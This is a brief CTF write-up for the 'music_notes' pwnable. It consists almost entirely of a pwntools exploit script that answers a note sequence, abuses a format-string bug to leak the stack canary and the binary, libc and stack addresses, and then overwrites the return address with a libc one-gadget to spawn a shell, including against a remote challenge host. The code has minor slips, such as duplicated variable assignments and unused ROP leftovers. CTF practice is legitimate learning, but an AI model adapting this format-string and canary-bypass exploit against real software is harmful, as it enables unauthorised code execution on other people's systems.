Tags: pwnables pwn format-string
Rating: 5.0
We must answer the correct notes `D -> B -> A -> G -> D`, exploit a format string vuln to leak libc, then trigger a one gadget. We must also use the format string the leak the canary and then place it in the ROP chain so it stys intact, avoiding the SIGABRT
```python
#!/usr/bin/env python3
from pwn import *
elf = ELF("./music_notes_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.27.so")
context.binary = elf
context.log_level = "debug"
gs = '''
continue
'''
def conn():
if args.REMOTE:
r = remote("68.183.40.128", 30653)
else:
r = process([elf.path])
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
return r
def getNotes(): # handle the retreival of the notes
p.recvuntil(b"Choose note:")
Note1 = p.recvline()
Note2 = p.recvline()
return Note1, Note2
p = conn()
# D B A G D
Note1, Note1 = getNotes()
if b"D" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
Note1, Note1 = getNotes()
if b"B" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
Note1, Note1 = getNotes()
if b"A" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
Note1, Note1 = getNotes()
if b"G" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
Note1, Note1 = getNotes()
if b"D" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
# get stack leak, canary, libc
p.sendlineafter(b"> ", b"%31$p %19$p %2$p %1$p")
p.recvuntil(b"[*] So, your name is: ")
canary = int(p.recv(18), 16)
elf_leak = int(p.recv(15).strip(), 16)
libc_leak = int(p.recv(15).strip(), 16)
stack_leak = int(p.recv(15).strip(), 16)
success(f"Leaked canary {hex(canary)}")
info(f"Leaked elf address {hex(elf_leak)}")
elf.address = elf_leak - elf.sym.sheet - 210
success(f"Leaked binary base {hex(elf.address)}")
info(f"Leaked libc address {hex(libc_leak)}")
libc.address = libc_leak - libc.sym["_IO_stdfile_1_lock"]
success(f"Leaked libc base {hex(libc.address)}")
info(f"Leaked stack address {hex(stack_leak)}")
rbp = stack_leak + 9936
success(f"Found rbp @ {hex(rbp)}")
warning(f"Address of sheet {hex(elf.sym.sheet)}")
pop_rdi = 0x0000000000001053
pop_rdi_pop_rbp = 0x0000000000022203
rop = ROP(libc)
binsh = next(libc.search(b"/bin/sh"))
#pop_rdi = rop.find_gadget(["pop rdi", "ret"])
rop.raw(p64(elf.sym.sheet))
payload1 = flat({40: p64(canary),
104-8: p64(rbp),
104: p64(0x4f432+libc.address)})
p.sendafter(b":", payload1)
#p.sendafter(b":", payload2)
p.interactive()
p.close()
```
